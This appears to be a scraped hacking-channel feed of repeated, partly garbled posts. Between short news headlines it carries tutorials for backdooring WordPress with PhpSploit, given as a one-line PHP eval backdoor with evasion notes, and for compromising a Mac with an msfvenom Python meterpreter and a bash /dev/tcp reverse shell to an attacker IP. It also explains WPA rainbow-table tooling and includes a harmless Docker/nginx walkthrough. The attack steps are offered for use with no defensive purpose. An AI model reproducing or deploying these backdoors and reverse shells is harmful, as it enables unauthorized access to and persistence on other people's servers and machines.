Forwarded from UNDERCODE NEWS
KT HoldsβCommunication Big Data Platform Road Showβ, which gathered in one place for communication big data
#international
#international
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Backdooring WordPress with Phpsploit:
PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
download https://github.com/nil0x42/phpsploit
When running Phpsploit and generating a standard backdoor to place in WordPress or PHP-code it looks like this:
<?php @eval($_SERVER[βHTTP_PHPSPL01Tβ]); ?>
The above code can be generated by running the following command:
./phpsploit --interactive --eval "backdoor"
And if we insert this little eval-code snippet into a WordPress php-file and then upload the file to VirusTotal the detection rate looks like this for the 58 different antivirus-scanners currently online virus total
ust one hit and it is ClamAV detecting the backdoor as Php.Trojan.PhpSploit-7157376-0.
If we then run phpsploit again and set another PASSKEY
as exampleAnd should be quite easy to trigger IDS alerts at network level since PHP-code like eval and base64_decode should not be a part of a http-header. This can also of course be changed in Phpsploit by using the command set REQ_HEADER_PAYLOAD.
from wpsec
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Backdooring WordPress with Phpsploit:
PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
download https://github.com/nil0x42/phpsploit
When running Phpsploit and generating a standard backdoor to place in WordPress or PHP-code it looks like this:
<?php @eval($_SERVER[βHTTP_PHPSPL01Tβ]); ?>
The above code can be generated by running the following command:
./phpsploit --interactive --eval "backdoor"
And if we insert this little eval-code snippet into a WordPress php-file and then upload the file to VirusTotal the detection rate looks like this for the 58 different antivirus-scanners currently online virus total
ust one hit and it is ClamAV detecting the backdoor as Php.Trojan.PhpSploit-7157376-0.
If we then run phpsploit again and set another PASSKEY
as exampleAnd should be quite easy to trigger IDS alerts at network level since PHP-code like eval and base64_decode should not be a part of a http-header. This can also of course be changed in Phpsploit by using the command set REQ_HEADER_PAYLOAD.
from wpsec
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - nil0x42/phpsploit: Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor
Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor - nil0x42/phpsploit
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Download & run nginx
1) [root@localhost my.Shells]# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
docker.io/redis latest 1e70071f4af4 6 weeks ago 106.7 MB
2) [root@localhost my.Shells]# docker pull nginx //δΈθ½½nginx
Using default tag: latest
3) Trying to pull repository docker.io/library/nginx ...
latest: Pulling from docker.io/library/nginx
e7bb522d92ff: Pull complete
6edc05228666: Pull complete
cd866a17e81f: Pull complete
4) Digest: sha256:285b49d42c703fdf257d1e2422765c4ba9d3e37768d6ea83d7fe2043dad6e63d
[root@localhost my.Shells]# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
docker.io/nginx latest 3f8a4339aadd 3 weeks ago 108.5 MB
docker.io/redis latest 1e70071f4af4 6 weeks ago 106.7 MB
4) Run nginx
[root@localhost my.Shells]# docker run -p 8080:80 -d docker.io/nginx
c0462d5e18783e20f9515108fa62ab0f2ac808ea85370a7c82aee9407abf4672
[root@localhost my.Shells]# netstat -anp | grep 8080
tcp6 0 0 :::8080 :::* LISTEN 2529/docker-proxy-c
5) [root@localhost my.Shells]# docker ps //nginxε·²η»ε¨θΏθ‘δΊ
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
c0462d5e1878 docker.io/nginx "nginx -g 'daemon off" 4 minutes ago Up 4 minute
6) Run results
[root@localhost my.Shells]# ./openFirewallPort.sh
---openFirewallPort.sh-------
echo "enter the port: "
read port
firewall-cmd --add-port=$port/tcp
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Download & run nginx
1) [root@localhost my.Shells]# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
docker.io/redis latest 1e70071f4af4 6 weeks ago 106.7 MB
2) [root@localhost my.Shells]# docker pull nginx //δΈθ½½nginx
Using default tag: latest
3) Trying to pull repository docker.io/library/nginx ...
latest: Pulling from docker.io/library/nginx
e7bb522d92ff: Pull complete
6edc05228666: Pull complete
cd866a17e81f: Pull complete
4) Digest: sha256:285b49d42c703fdf257d1e2422765c4ba9d3e37768d6ea83d7fe2043dad6e63d
[root@localhost my.Shells]# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
docker.io/nginx latest 3f8a4339aadd 3 weeks ago 108.5 MB
docker.io/redis latest 1e70071f4af4 6 weeks ago 106.7 MB
4) Run nginx
[root@localhost my.Shells]# docker run -p 8080:80 -d docker.io/nginx
c0462d5e18783e20f9515108fa62ab0f2ac808ea85370a7c82aee9407abf4672
[root@localhost my.Shells]# netstat -anp | grep 8080
tcp6 0 0 :::8080 :::* LISTEN 2529/docker-proxy-c
5) [root@localhost my.Shells]# docker ps //nginxε·²η»ε¨θΏθ‘δΊ
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
c0462d5e1878 docker.io/nginx "nginx -g 'daemon off" 4 minutes ago Up 4 minute
6) Run results
[root@localhost my.Shells]# ./openFirewallPort.sh
---openFirewallPort.sh-------
echo "enter the port: "
read port
firewall-cmd --add-port=$port/tcp
β β β Uππ»βΊπ«Δπ¬πβ β β β
Docker
Docker Hub Container Image Library | App Containerization
Welcome to the world's largest container registry built for developers and open source contributors to find, use, and share their container images. Build, push and pull.
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
The US Spy Agency warns of attacks by Chinese hackers on the army, security and industry.
#CyberAttacks
#CyberAttacks
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK MACOS WITH PAYLOAD-Metasploit:
1) Turn on your Kali and open a terminal.
2) Type in msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py
Now the pyterpreter.py should appear in your Home folder
pyterpreter script location
3) Open a new terminal and launch Metasploit by typing in msfconsole and press Enter. We need to set up a listener so when the script is running on the Mac computer it will instantly connect back to our attack machine.
msfconsole
4) In the new terminal, type in use multi/handler and press Enter
multi handler
5) Now we need to set the PAYLOAD, the LHOST which is the attacker IP address and the LPORT which is the port we want to listen on. You can do that by executing the following commands consecutively.
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.26.130
set LPORT 4444
set payload lhost lport
6) To start up the handler, enter this command exploit -j -z
exploit
7) Now send the pyterpreter.py file to the Mac machine and execute it.
Enter the command session -i 1 and press Enter. You should now be able to interact with the Mac machine.
bash -i >& /dev/tcp/192.168.26.130/4444 0>&1 2>&1
This command simply means "send an interactive bash session to IP address 192.168.26.130 on TCP port 4444."
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK MACOS WITH PAYLOAD-Metasploit:
1) Turn on your Kali and open a terminal.
2) Type in msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py
Now the pyterpreter.py should appear in your Home folder
pyterpreter script location
3) Open a new terminal and launch Metasploit by typing in msfconsole and press Enter. We need to set up a listener so when the script is running on the Mac computer it will instantly connect back to our attack machine.
msfconsole
4) In the new terminal, type in use multi/handler and press Enter
multi handler
5) Now we need to set the PAYLOAD, the LHOST which is the attacker IP address and the LPORT which is the port we want to listen on. You can do that by executing the following commands consecutively.
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.26.130
set LPORT 4444
set payload lhost lport
6) To start up the handler, enter this command exploit -j -z
exploit
7) Now send the pyterpreter.py file to the Mac machine and execute it.
Enter the command session -i 1 and press Enter. You should now be able to interact with the Mac machine.
bash -i >& /dev/tcp/192.168.26.130/4444 0>&1 2>&1
This command simply means "send an interactive bash session to IP address 192.168.26.130 on TCP port 4444."
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Wi-Fi rainbow table generator
Wi-Fi rainbow tables can be generated by the wlangenpmkocl program from the hcxkeys package .
The hcxkeys package includes two utilities:
1) wlangenpmk - Generates plainmasterkeys (using CPU) from essid and password for use in hashcat (with hash mode 2501) or John the Ripper (hash type wpapsk-pmk)
2) wlangenpmkocl - generates plainmasterkeys (using GPU) from essid and password for use in hashcat (with 2501 hash mode) or John the Ripper (wpapsk-pmk hash type)
That is, the only difference between them is that
3) wlangenpmkocl uses a video card, while wlangenpmk uses a central processor. It is of course preferable to use the graphics card version (i.e. wlangenpmkocl ). The wlangenpmk version is only for extreme situations - you do not have a discrete video card or you cannot install its driver for full OpenCL support
π¦How to install hcxkeys
To use wlangenpmkocl , install the drivers for the video card, information about this and about OpenCL can be found in the articles:
Installing video drivers in Linux
How to crack passwords in Linux with a video card and a central processor
Installation on Kali Linux
1) sudo apt install openssl opencl-headers git
2) git clone https://github.com/ZerBea/hcxkeys
3) cd hcxkeys/
4) make
5) sudo make install
If the following messages are displayed while executing the make command :
1) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o wlangenpmk wlangenpmk.c -lcrypto
2) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o wlangenpmkocl wlangenpmkocl.c -lcrypto -lOpenCL
3) In file included from /usr/include/CL/cl.h:20,
from wlangenpmkocl.c:26:
/usr/include/CL/cl_version.h:22:9: note: β#pragma message: cl_version.h: CL_TARGET_OPENCL_VERSION is not defined.
4) Defaulting to 220 (OpenCL 2.2)β
22 | #pragma message("cl_version.h: CL_TARGET_OPENCL_VERSION is not defined. Defaulting to 220 (OpenCL 2.2)")
| ^~~~~~~
5) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o pwhash pwhash.c -lcrypto
6) then these are not errors - they are information. Compilation should still succeed and you can continue.
Installation in BlackArch
sudo pacman -S hcxkeys
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Wi-Fi rainbow table generator
Wi-Fi rainbow tables can be generated by the wlangenpmkocl program from the hcxkeys package .
The hcxkeys package includes two utilities:
1) wlangenpmk - Generates plainmasterkeys (using CPU) from essid and password for use in hashcat (with hash mode 2501) or John the Ripper (hash type wpapsk-pmk)
2) wlangenpmkocl - generates plainmasterkeys (using GPU) from essid and password for use in hashcat (with 2501 hash mode) or John the Ripper (wpapsk-pmk hash type)
That is, the only difference between them is that
3) wlangenpmkocl uses a video card, while wlangenpmk uses a central processor. It is of course preferable to use the graphics card version (i.e. wlangenpmkocl ). The wlangenpmk version is only for extreme situations - you do not have a discrete video card or you cannot install its driver for full OpenCL support
π¦How to install hcxkeys
To use wlangenpmkocl , install the drivers for the video card, information about this and about OpenCL can be found in the articles:
Installing video drivers in Linux
How to crack passwords in Linux with a video card and a central processor
Installation on Kali Linux
1) sudo apt install openssl opencl-headers git
2) git clone https://github.com/ZerBea/hcxkeys
3) cd hcxkeys/
4) make
5) sudo make install
If the following messages are displayed while executing the make command :
1) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o wlangenpmk wlangenpmk.c -lcrypto
2) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o wlangenpmkocl wlangenpmkocl.c -lcrypto -lOpenCL
3) In file included from /usr/include/CL/cl.h:20,
from wlangenpmkocl.c:26:
/usr/include/CL/cl_version.h:22:9: note: β#pragma message: cl_version.h: CL_TARGET_OPENCL_VERSION is not defined.
4) Defaulting to 220 (OpenCL 2.2)β
22 | #pragma message("cl_version.h: CL_TARGET_OPENCL_VERSION is not defined. Defaulting to 220 (OpenCL 2.2)")
| ^~~~~~~
5) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o pwhash pwhash.c -lcrypto
6) then these are not errors - they are information. Compilation should still succeed and you can continue.
Installation in BlackArch
sudo pacman -S hcxkeys
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - ZerBea/hcxkeys: Small set of tools to generate plainmasterkeys (rainbowtables) and hashes for the use with latest hashcatβ¦
Small set of tools to generate plainmasterkeys (rainbowtables) and hashes for the use with latest hashcat and John the Ripper. - ZerBea/hcxkeys
Forwarded from UNDERCODE NEWS
Microsoft employees began moving to the new campus in Herzliya, which was established with an investment of about NIS 350 million .
#international
#international
